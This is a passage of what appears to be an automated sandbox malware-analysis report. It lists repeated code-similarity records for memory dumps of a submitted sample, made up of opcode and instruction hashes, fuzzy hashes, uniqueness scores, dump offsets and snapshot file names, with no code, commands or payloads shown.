                                                                                                                                                    • Opcode Fuzzy Hash: 5581d03d8324408a84dac049884a368c690930603b4a7dc84c63fb8adeb7b18e
                                                                                                                                                    • Instruction Fuzzy Hash: 613122B0808284EFCB22CB24D8947EDBFF2AF56300F1580ABD004AB792D7395D85DB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.418364494.00000000000DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000DD000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_dd000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 78115b18419a3e8ddf0367e8df167f6f020cdf0d409ab58865a5b5a314b63103
                                                                                                                                                    • Instruction ID: 9a02027184d901c2ef5d2e699642e79749cc56b023457f779d639663cd7af270
                                                                                                                                                    • Opcode Fuzzy Hash: 78115b18419a3e8ddf0367e8df167f6f020cdf0d409ab58865a5b5a314b63103
                                                                                                                                                    • Instruction Fuzzy Hash: CE21D3B1604740EFDB15CF14E9C0B2ABFA5EB98318F24856BE8054B35AC336D956CBB1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9fd765ee05628745458726e77a1848672857c1656909f9cb57624546a72b5830
                                                                                                                                                    • Instruction ID: 172cc4bb6d4e556cc1d7a31b40cd2191e3e64bce8fdef0ba3a55728289c2682d
                                                                                                                                                    • Opcode Fuzzy Hash: 9fd765ee05628745458726e77a1848672857c1656909f9cb57624546a72b5830
                                                                                                                                                    • Instruction Fuzzy Hash: 85211D366411149FCB09CFA8D948D99BBB2FF48320B1644A9E5099B372D732ED15DB40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1e7c324677b58a90d97e8a33beca13e878d9dfe556ab23680b206f815c7a69f7
                                                                                                                                                    • Instruction ID: 05bb1c6ec49811bea54533ce59356363fe3021f385315ba9bcccedfdd579a16c
                                                                                                                                                    • Opcode Fuzzy Hash: 1e7c324677b58a90d97e8a33beca13e878d9dfe556ab23680b206f815c7a69f7
                                                                                                                                                    • Instruction Fuzzy Hash: C1216635A406099FDB18DBB8C414BEFBBF6EB04340F248066D80ADB290E734EA11DF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: da1b3a671e42ecc6bf5061e0e14c1f46766cb7ccc355c92c858f0e44fe2adda9
                                                                                                                                                    • Instruction ID: d57893d75a24f28dc4a80ef626439bd493dbb50380590a6ee270a10a757c39d5
                                                                                                                                                    • Opcode Fuzzy Hash: da1b3a671e42ecc6bf5061e0e14c1f46766cb7ccc355c92c858f0e44fe2adda9
                                                                                                                                                    • Instruction Fuzzy Hash: 35316D74A00629CBDB24CB10C590BBEB7B1AF58700F5141CADB4AA7351D774AE81DF85
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8590663a7dcfc82b9b49bf22f78ace71ddba6f17d39d4bb7f1b36f247597b1c9
                                                                                                                                                    • Instruction ID: e6501e05e9b27a39fe7bce95751ece1440fcde4b8772b54e2969665a3ecf89db
                                                                                                                                                    • Opcode Fuzzy Hash: 8590663a7dcfc82b9b49bf22f78ace71ddba6f17d39d4bb7f1b36f247597b1c9
                                                                                                                                                    • Instruction Fuzzy Hash: 3221AA74A14A05CFC705EFA8D4545AEBBF1FF8A300B10426FD505D73A1EB349946CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 30fdf8306e794061e02c7c4dd79a9ca2c81b08660fea5aec759d068ced2c038d
                                                                                                                                                    • Instruction ID: aa0c7620223d57a3a09aab3b5bc31c972cf32490a0d508aaa28f1985477ef1f9
                                                                                                                                                    • Opcode Fuzzy Hash: 30fdf8306e794061e02c7c4dd79a9ca2c81b08660fea5aec759d068ced2c038d
                                                                                                                                                    • Instruction Fuzzy Hash: 4D210871A402098FCB18DF98C945ADEB7F2FF48300F6145A9E405AB3A1DB769E45CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7a01636e426056f781bcfedc8ad26f1ac190eedae8307730958be70ee4e21471
                                                                                                                                                    • Instruction ID: adc6784ab39afab344aafcfa1bce4bf6cf7edfdb5716668762c6c8f1b2f151bd
                                                                                                                                                    • Opcode Fuzzy Hash: 7a01636e426056f781bcfedc8ad26f1ac190eedae8307730958be70ee4e21471
                                                                                                                                                    • Instruction Fuzzy Hash: 06217C74A00629CBDB24CB10C590FBEB7B1AF58700F5141CADB4AA7351DB78AE81DF85
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 23d8dc61859a4cfe276efb8376c36ea2c635a5f7dbf1fd09e4a5e8dc1907bca4
                                                                                                                                                    • Instruction ID: 07b0d50b07432cd5d731261c3618cc77b91c7464cc14ff2a4a226d2d1e3736a4
                                                                                                                                                    • Opcode Fuzzy Hash: 23d8dc61859a4cfe276efb8376c36ea2c635a5f7dbf1fd09e4a5e8dc1907bca4
                                                                                                                                                    • Instruction Fuzzy Hash: D6216B31A09204CFE714DB66E8887E973B3AB88311F6CE0A6D5014B269C7749DC6CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5869725df733baca9cbdb90226ee61f35ae937406f80548b85041927db27c907
                                                                                                                                                    • Instruction ID: 642cde1717049483f355b35d2a774da972a05aabfb9aa3a8b68986ff45d93439
                                                                                                                                                    • Opcode Fuzzy Hash: 5869725df733baca9cbdb90226ee61f35ae937406f80548b85041927db27c907
                                                                                                                                                    • Instruction Fuzzy Hash: 5B216B71A402098FCB18DF94C955ADEB7F2BF48300F6045A9E401AB3A1CB769D46CFA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a3c33be9071876e9d07c083332d7f073541c19657c709ec6f8d6f7ad72913d30
                                                                                                                                                    • Instruction ID: fe2abb5a2b91733c80a27b90206424f65e8e979cc72d4091f3e9098b9af257c4
                                                                                                                                                    • Opcode Fuzzy Hash: a3c33be9071876e9d07c083332d7f073541c19657c709ec6f8d6f7ad72913d30
                                                                                                                                                    • Instruction Fuzzy Hash: 43210474600A008FC324DF59E544A5AFBF5FF84324F59CA6AE49A8B7A2C774F8458B90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 956db4cea0340be7764fef6f317913b9163f140402ec590c50bc4810c2bf4a2e
                                                                                                                                                    • Instruction ID: 210f5193e19fec786529e14f09a7fa05f6c1e19c1cccca6de6c1ddaa4f2bed63
                                                                                                                                                    • Opcode Fuzzy Hash: 956db4cea0340be7764fef6f317913b9163f140402ec590c50bc4810c2bf4a2e
                                                                                                                                                    • Instruction Fuzzy Hash: 0B218C31A4A204CFD714EB25E4897E972B3AB89711FACD0B5D4004B36AC7349EC5CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d2e98072dd66e381c3052ae8b46725af60b5d6e8a36e47052203790dc2e01c3e
                                                                                                                                                    • Instruction ID: 063a4f0086d6b802e35453c62e634a762f8922ffec5d11ddfc99b2b3c4b5c7a3
                                                                                                                                                    • Opcode Fuzzy Hash: d2e98072dd66e381c3052ae8b46725af60b5d6e8a36e47052203790dc2e01c3e
                                                                                                                                                    • Instruction Fuzzy Hash: FA21C0347402048FCB15DF24D894AAEBBF6EFC9310B14456AE506D73A2CB70AD49CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8434e1509c57c8fb878267725606554195f0f8cfd16877040c520c4f4e574104
                                                                                                                                                    • Instruction ID: f105dc919bdc75ca71b1b071af16764ade0bd1b52d82b4bbc8c7adcb9c63ae71
                                                                                                                                                    • Opcode Fuzzy Hash: 8434e1509c57c8fb878267725606554195f0f8cfd16877040c520c4f4e574104
                                                                                                                                                    • Instruction Fuzzy Hash: ED21BE30904656EFCF09CF98C9809AAFBB2FF45300F12C96AD60597685D774AC95CB84
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0b902d8e81b5be8392980a1402f57ebcbecb852be9996320852b48cd0c42d661
                                                                                                                                                    • Instruction ID: fe310d8164c6cf8412d71e1c31b86b9d8aadbc4028c1d903d5001cd4e1287d37
                                                                                                                                                    • Opcode Fuzzy Hash: 0b902d8e81b5be8392980a1402f57ebcbecb852be9996320852b48cd0c42d661
                                                                                                                                                    • Instruction Fuzzy Hash: CA112330B006194BE725AA2A8860A7FF7EA9FC0710F05853F9A19D7380CE78AC015395
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 67dbb454993a3d5844d4bc274fc53c53ae47d9c3475e7cc52563a874f6fdcb3d
                                                                                                                                                    • Instruction ID: 5c6ccbe944b2f07221a3b1d56f18029f7fccf1e42ac4e320cbe6fc2e5177c01d
                                                                                                                                                    • Opcode Fuzzy Hash: 67dbb454993a3d5844d4bc274fc53c53ae47d9c3475e7cc52563a874f6fdcb3d
                                                                                                                                                    • Instruction Fuzzy Hash: A0219D70A00629CBDF24CB10C990BBEB7B1AF58700F5041CADB4AA7741DB789E81CF85
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3ea4479ac29b5e6dad745b0b52dc1ce472e3a401f7d9621a79d11c7d150da40c
                                                                                                                                                    • Instruction ID: 5880c4d14c36fda2af1e2e523ca4c48f771c36115b5d89b453781a44c85e3671
                                                                                                                                                    • Opcode Fuzzy Hash: 3ea4479ac29b5e6dad745b0b52dc1ce472e3a401f7d9621a79d11c7d150da40c
                                                                                                                                                    • Instruction Fuzzy Hash: 6C213831A406148FC715DF68C99895A7BF6EF49725B1180AAE506DB3B2DB31EC05CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0a054e8b2915d77900470259701277263700947797c793f301f38ad2a2c80c14
                                                                                                                                                    • Instruction ID: e8851ed4c2d8218b1f7d2c4a0eb82bb71bd29640cf72a06513e4d141dd71aa87
                                                                                                                                                    • Opcode Fuzzy Hash: 0a054e8b2915d77900470259701277263700947797c793f301f38ad2a2c80c14
                                                                                                                                                    • Instruction Fuzzy Hash: FE215030E082058FCB50EFA9E4493EEB7B3EB85300F18C076D41597745D7349A86CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fae35c7928e0d1cb087b94c1dbfaedfdc9a762a19178be42b6a74554264f2bfd
                                                                                                                                                    • Instruction ID: a61ffa3dbb5172fd8768536ec5819efdb10e01e67adfad913785b673ac6aba22
                                                                                                                                                    • Opcode Fuzzy Hash: fae35c7928e0d1cb087b94c1dbfaedfdc9a762a19178be42b6a74554264f2bfd
                                                                                                                                                    • Instruction Fuzzy Hash: 41115E753042449FD324DF2DD888E56BBF9EF89314B15856BE44ACB752D734E806CB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 703a76e35aaf1d735091358b06384742ce1ff46309fb086ec798d3951ef5c929
                                                                                                                                                    • Instruction ID: 5f216f4f2d647789468594c18b491a7ef7c204bb96628bc55b2153fbfd5baec2
                                                                                                                                                    • Opcode Fuzzy Hash: 703a76e35aaf1d735091358b06384742ce1ff46309fb086ec798d3951ef5c929
                                                                                                                                                    • Instruction Fuzzy Hash: 78219D70A00629CBDB24CB00C950BFEB7B1AF58700F5041CADB4AA7341CB749E81CF85
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c4defbcad4b9e7f49beebf490d10ec83e37f92b9a0a5872671b2c4d18d546c1b
                                                                                                                                                    • Instruction ID: 763aaa275e281303ad7c442b933dd68d3bc4a7ea018957beb23a0fe9e3267fd9
                                                                                                                                                    • Opcode Fuzzy Hash: c4defbcad4b9e7f49beebf490d10ec83e37f92b9a0a5872671b2c4d18d546c1b
                                                                                                                                                    • Instruction Fuzzy Hash: 87112532614120CFD7309BACE4557217BF4EB953E0B4A80D7D009CB356DA7ADC01DB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 44ab0ae9598345b25d7149dc47c5f808e8ad96791420d587bbb2e1c0e5f661fa
                                                                                                                                                    • Instruction ID: a9e7a87b80aee538349067dc6a4c608939e8f828f303fd0305f5d4c3ff9542d3
                                                                                                                                                    • Opcode Fuzzy Hash: 44ab0ae9598345b25d7149dc47c5f808e8ad96791420d587bbb2e1c0e5f661fa
                                                                                                                                                    • Instruction Fuzzy Hash: CE113A728002499FDB10CF9AC844BEEBFF5EF88324F248419D458A7254C774AA54DFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.418364494.00000000000DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000DD000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_dd000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ce44f6fe7a28b32b333783b460579ef617a672a1c87bb5bd3d66835bf8f739a8
                                                                                                                                                    • Instruction ID: cf3a8abca47129dcce30e94567f628663297973de6f53fb0ffc05bbc52557333
                                                                                                                                                    • Opcode Fuzzy Hash: ce44f6fe7a28b32b333783b460579ef617a672a1c87bb5bd3d66835bf8f739a8
                                                                                                                                                    • Instruction Fuzzy Hash: FF11AF76504740DFDB12CF14D9C4B16BFA1FB94314F24C6AAD8094B31AC33AD95ACBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d846c216419942455c873708b00c9b589c1ab929f6ad2da688a81fbc8327edb2
                                                                                                                                                    • Instruction ID: 34f496189aee07dfada8afd946883245ac2405e8fdce7c4a2a4900683d23560a
                                                                                                                                                    • Opcode Fuzzy Hash: d846c216419942455c873708b00c9b589c1ab929f6ad2da688a81fbc8327edb2
                                                                                                                                                    • Instruction Fuzzy Hash: 9C118EB1A042008FDB049F54D8857AA7BA2FFC8301F24C879D5499F286DBB1D946CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b2e2a6ed7b046c122e0021e3a70e2139dfd96c2548b4c1dce06115b565226ca7
                                                                                                                                                    • Instruction ID: 08f42da6cd7ee1506f07a25ece37b4bbef7c40c7e6ad43972221b8da91304646
                                                                                                                                                    • Opcode Fuzzy Hash: b2e2a6ed7b046c122e0021e3a70e2139dfd96c2548b4c1dce06115b565226ca7
                                                                                                                                                    • Instruction Fuzzy Hash: 8F119E357092148BD714AF66F4087FA72A3EBC8712F28C062E80547799CB34ADC78BC1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: cbee13f44bf347289a4626474b455bf826be3c009962076d6cafa4de2395e959
                                                                                                                                                    • Instruction ID: a62c7a4d266c26a62c47ebe1453268651538672c11dd52b9973f583b192b189e
                                                                                                                                                    • Opcode Fuzzy Hash: cbee13f44bf347289a4626474b455bf826be3c009962076d6cafa4de2395e959
                                                                                                                                                    • Instruction Fuzzy Hash: 59215078A52219AFDB08DF58D598AADB7B2BF49300F604059F805AB3A1CB35AD45CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 11b7b5155229b6d5ac260c71ce3743b50a1bc8b64cd062cb874e0315ce23dfa3
                                                                                                                                                    • Instruction ID: 409c77bed43ef8c5a221b8f44409084785cf5e247dd53e52e452c78d028188ce
                                                                                                                                                    • Opcode Fuzzy Hash: 11b7b5155229b6d5ac260c71ce3743b50a1bc8b64cd062cb874e0315ce23dfa3
                                                                                                                                                    • Instruction Fuzzy Hash: 6D21AC30A00629CBEB24CB10C950BFEB7B1AF58700F6041CADB4AA7741CBB49E81CF85
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b147803aaedd7b96910333a0900cef03f44c4c340967b42837b7c27b86390fa4
                                                                                                                                                    • Instruction ID: 09be3cbf7bbef76d9e82376439cc8f89d2830dc64c36103a04bf4f83efda17e6
                                                                                                                                                    • Opcode Fuzzy Hash: b147803aaedd7b96910333a0900cef03f44c4c340967b42837b7c27b86390fa4
